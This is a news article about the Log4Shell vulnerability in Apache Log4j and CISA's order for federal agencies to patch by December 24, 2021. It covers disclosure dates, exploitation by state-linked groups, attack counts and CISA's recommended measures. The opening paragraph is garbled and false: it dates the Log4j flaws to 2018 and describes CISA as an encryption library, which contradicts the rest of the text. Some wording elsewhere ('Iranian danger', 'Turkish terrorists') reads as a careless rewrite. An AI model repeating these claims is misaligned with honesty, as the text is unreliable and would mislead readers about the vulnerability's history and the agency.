In the last few years, two widely used open-source software packages have been found to be vulnerable and need to be fixed. The first is Log4j and in 2018 was discovered that it had security flaws which could allow attackers to gain root access on systems running it. The second package is CISA, a library for building secure application that can easily handle large amounts of data with encryption. In January 2019, an oversight by developers led them not notice some issues stemming from a recent refactor
CISA (Cybersecurity and Infrastructure Agency) has issued an order to federal civilian agencies to patch systems vulnerable by the Log4Shell vulnerability by Christmas night, in what is turning out to be one of the biggest security holes ever uncovered. The vulnerability, along with 12 other security issues, has been added to the agency’s list of actively exploited vulnerabilities.
Alibaba’s Cloud Security team originally disclosed the issue on November 24. On December 9, the initial proof-of-concept was released on Github, and the vulnerability has been extensively abused since then.
According to a clear schedule specified in the catalogue, federal entities have ten days to assess whether internal applications and servers utilize the compromised Log4j library, confirm if they’re susceptible, and implement updates by December 24.
To resolve a significant vulnerability impacting the Apache log4j #software library, we’re working closely with our public and private sector partners. Threat actors are extensively exploiting this vulnerability, making it a critical task to patch: 1/2 utbcDZBtPv https://t.co/utbcDZBtPv
— December 13, 2021, Cybersecurity and Infrastructure Security Agency (@CISAgov)
The CISA has also developed a website to educate the public and business sectors in the United States about the risk. Royce Williams, a security researcher, has already compiled a list of over 300 companies to determine who is and isn’t affected by the flaw. Another comparable list is maintained by the Dutch National Cyber Security Center.
Hack DHS: The Department of Homeland Security’s bug bounty program, which rewards up to $5000.
Patches for the log4J library have been made available, and the Apache Foundation has published an official upgrade to address the vulnerability. However, due to the large extent of the library’s implementation, testing for vulnerabilities and distributing updates will be difficult.
Despite the fact that the issue was just found a few days ago, it’s already been dubbed one of the biggest security vulnerabilities ever owing to its broad usage among corporate software developers and simplicity of exploitation. Also, it has the ability to take over whole systems.
Attackers from China are aggressively seeking to exploit the weakness, according to both Microsoft and Mandiant. North Korean, Iranian, and Turkish terrorists are also exploiting the technique, according to Microsoft.
Phosphorus, an Iranian danger, and Hafnium, a Chinese threat, have both aggressively experimented with the problem.
The number of assaults has also increased dramatically. Since the assaults using the vulnerability started, Checkpoint stated that the number of attacks had risen to over 40,000 by Saturday, 200,000 by Sunday, and 800,000 by Monday, affecting roughly half of all business networks.
Three initial measures are recommended by CISA:
1Count the number of internet-facing Log4j endpoints.
2Confirm that your #SOC is responding to all alerts on devices that fall within the categories listed above.
3Install a web application firewall that is updated automatically. 2/2
— December 13, 2021, Cybersecurity and Infrastructure Security Agency (@CISAgov)
Malware and botnet operators have already taken advantage of the flaw, and ransomware gangs are anticipated to follow suit shortly.
Attacks are becoming more complex, according to Lunasec, as they overcome WAFs and get beyond the initial line of defense. Furthermore, the cybersecurity company warns that the issue might become worse if another vulnerability emerges, robbing users of whatever mitigations they’ve set in place.
In the News: In 2022, the Android 12 Go version will be available for low-end devices: 5 distinguishing characteristics
When he’s not writing/editing/shooting/hosting all things tech, he streams himself racing virtual vehicles. Yadullah may be reached at [email protected], or you can follow him on Instagram or Twitter.
